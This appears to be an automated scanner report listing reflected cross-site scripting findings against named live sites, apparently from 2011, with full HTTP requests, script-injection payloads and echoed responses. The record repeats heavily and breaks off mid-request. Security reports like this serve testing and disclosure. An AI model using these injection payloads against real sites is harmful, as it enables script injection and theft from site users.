HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 06 Feb 2011 01:56:13 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 1304
GA_googleSetAdContentsBySlotForSync({"Tile2_RightCol488f2<script>alert(1)</script>c924c785a0a":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f ...[SNIP]...
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 2c0d9<script>alert(1)</script>9e325663c1f was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mybeta/Search/newsearch.php3?q=32c0d9<script>alert(1)</script>9e325663c1f&Category=(select HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 23:30:06 GMT Content-Type: text/html Connection: close Keep-Alive: timeout=15, max=500 Content-Length: 25829
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the q request parameter is copied into the HTML document as text between TITLE tags. The payload c6f32</title><script>alert(1)</script>2663608f414 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mybeta/Search/newsearch.php3?q=3c6f32</title><script>alert(1)</script>2663608f414&Category=(select HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 23:30:08 GMT Content-Type: text/html Connection: close Keep-Alive: timeout=15, max=500 Content-Length: 26021
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4467d"><script>alert(1)</script>8eb7829c8dc was submitted in the q parameter. This input was echoed as 4467d\"><script>alert(1)</script>8eb7829c8dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mybeta/Search/newsearch.php3?q=34467d"><script>alert(1)</script>8eb7829c8dc&Category=(select HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 23:30:05 GMT Content-Type: text/html Connection: close Keep-Alive: timeout=15, max=500 Content-Length: 25901
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 865a4"-alert(1)-"ce65034e0f1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml HTTP/1.1 Host: appdeveloper.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=865a4"-alert(1)-"ce65034e0f1
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 23:18:20 GMT Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Set-Cookie: SESS5a5e2306769d28180c45e44dbead8572=38574e65cbb57f2b899725d71389c0ab; expires=Tue, 01-Mar-2011 02:51:40 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 05 Feb 2011 23:18:20 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Set-Cookie: loginpt=0 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> ...[SNIP]... ustom24 = ""; var wa_eCustom28="http://appdeveloper.intel.com/en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml";
var wa_custom11="http://www.google.com/search?hl=en&q=865a4"-alert(1)-"ce65034e0f1";
var wa_urlQueryString=""; var wa_reportSuites="intelappdeveloper,intelcorpsw"; var wa_trackDFA="n";
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edeec"style%3d"x%3aexpression(alert(1))"e9cdcf08be6 was submitted in the REST URL parameter 10. This input was echoed as edeec"style="x:expression(alert(1))"e9cdcf08be6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporationsedeec"style%3d"x%3aexpression(alert(1))"e9cdcf08be6 HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporationsedeec"style="x:expression(alert(1))"e9cdcf08be6?cid=rss-182178-c1-264110"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b7ba"style%3d"x%3aexpression(alert(1))"c49e060793 was submitted in the REST URL parameter 2. This input was echoed as 2b7ba"style="x:expression(alert(1))"c49e060793 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-2641102b7ba"style%3d"x%3aexpression(alert(1))"c49e060793/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-2641102b7ba"style="x:expression(alert(1))"c49e060793"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f74ef"style%3d"x%3aexpression(alert(1))"4e7c6c9736f was submitted in the REST URL parameter 3. This input was echoed as f74ef"style="x:expression(alert(1))"4e7c6c9736f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264110/newsroom.intel.comf74ef"style%3d"x%3aexpression(alert(1))"4e7c6c9736f/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.comf74ef"style="x:expression(alert(1))"4e7c6c9736f/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3c60"style%3d"x%3aexpression(alert(1))"f7e517be872 was submitted in the REST URL parameter 4. This input was echoed as a3c60"style="x:expression(alert(1))"f7e517be872 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264110/newsroom.intel.com/communitya3c60"style%3d"x%3aexpression(alert(1))"f7e517be872/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/communitya3c60"style="x:expression(alert(1))"f7e517be872/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76889"style%3d"x%3aexpression(alert(1))"10790f520d6 was submitted in the REST URL parameter 5. This input was echoed as 76889"style="x:expression(alert(1))"10790f520d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom76889"style%3d"x%3aexpression(alert(1))"10790f520d6/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom76889"style="x:expression(alert(1))"10790f520d6/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 836ce"style%3d"x%3aexpression(alert(1))"5c86aca20ef was submitted in the REST URL parameter 6. This input was echoed as 836ce"style="x:expression(alert(1))"5c86aca20ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog836ce"style%3d"x%3aexpression(alert(1))"5c86aca20ef/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog836ce"style="x:expression(alert(1))"5c86aca20ef/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0641"style%3d"x%3aexpression(alert(1))"b954a0a85d7 was submitted in the REST URL parameter 7. This input was echoed as a0641"style="x:expression(alert(1))"b954a0a85d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011a0641"style%3d"x%3aexpression(alert(1))"b954a0a85d7/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011a0641"style="x:expression(alert(1))"b954a0a85d7/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9097b"style%3d"x%3aexpression(alert(1))"cec4b375443 was submitted in the REST URL parameter 8. This input was echoed as 9097b"style="x:expression(alert(1))"cec4b375443 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/019097b"style%3d"x%3aexpression(alert(1))"cec4b375443/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/019097b"style="x:expression(alert(1))"cec4b375443/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3032"style%3d"x%3aexpression(alert(1))"44ad55bd7e was submitted in the REST URL parameter 9. This input was echoed as d3032"style="x:expression(alert(1))"44ad55bd7e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31d3032"style%3d"x%3aexpression(alert(1))"44ad55bd7e/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31d3032"style="x:expression(alert(1))"44ad55bd7e/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110"> ...[SNIP]...
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1f4c"style%3d"x%3aexpression(alert(1))"fade0cdb384 was submitted in the REST URL parameter 10. This input was echoed as b1f4c"style="x:expression(alert(1))"fade0cdb384 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industryb1f4c"style%3d"x%3aexpression(alert(1))"fade0cdb384 HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industryb1f4c"style="x:expression(alert(1))"fade0cdb384?cid=rss-182178-c1-264136"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ebf"style%3d"x%3aexpression(alert(1))"590865e6e81 was submitted in the REST URL parameter 2. This input was echoed as b0ebf"style="x:expression(alert(1))"590865e6e81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264136b0ebf"style%3d"x%3aexpression(alert(1))"590865e6e81/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136b0ebf"style="x:expression(alert(1))"590865e6e81"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 466d2"style%3d"x%3aexpression(alert(1))"1ac3c960942 was submitted in the REST URL parameter 3. This input was echoed as 466d2"style="x:expression(alert(1))"1ac3c960942 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264136/newsroom.intel.com466d2"style%3d"x%3aexpression(alert(1))"1ac3c960942/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com466d2"style="x:expression(alert(1))"1ac3c960942/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9389"style%3d"x%3aexpression(alert(1))"f5c3f0bb420 was submitted in the REST URL parameter 4. This input was echoed as b9389"style="x:expression(alert(1))"f5c3f0bb420 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264136/newsroom.intel.com/communityb9389"style%3d"x%3aexpression(alert(1))"f5c3f0bb420/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/communityb9389"style="x:expression(alert(1))"f5c3f0bb420/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12e33"style%3d"x%3aexpression(alert(1))"4ade294bbf was submitted in the REST URL parameter 5. This input was echoed as 12e33"style="x:expression(alert(1))"4ade294bbf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom12e33"style%3d"x%3aexpression(alert(1))"4ade294bbf/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom12e33"style="x:expression(alert(1))"4ade294bbf/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f162d"style%3d"x%3aexpression(alert(1))"85b19f3f875 was submitted in the REST URL parameter 6. This input was echoed as f162d"style="x:expression(alert(1))"85b19f3f875 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blogf162d"style%3d"x%3aexpression(alert(1))"85b19f3f875/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blogf162d"style="x:expression(alert(1))"85b19f3f875/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81880"style%3d"x%3aexpression(alert(1))"bb824d9c0ed was submitted in the REST URL parameter 7. This input was echoed as 81880"style="x:expression(alert(1))"bb824d9c0ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/201181880"style%3d"x%3aexpression(alert(1))"bb824d9c0ed/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/201181880"style="x:expression(alert(1))"bb824d9c0ed/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8cfc"style%3d"x%3aexpression(alert(1))"cbc4fac7e2f was submitted in the REST URL parameter 8. This input was echoed as d8cfc"style="x:expression(alert(1))"cbc4fac7e2f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01d8cfc"style%3d"x%3aexpression(alert(1))"cbc4fac7e2f/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01d8cfc"style="x:expression(alert(1))"cbc4fac7e2f/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bac26"style%3d"x%3aexpression(alert(1))"4f9f28749e was submitted in the REST URL parameter 9. This input was echoed as bac26"style="x:expression(alert(1))"4f9f28749e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31bac26"style%3d"x%3aexpression(alert(1))"4f9f28749e/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1
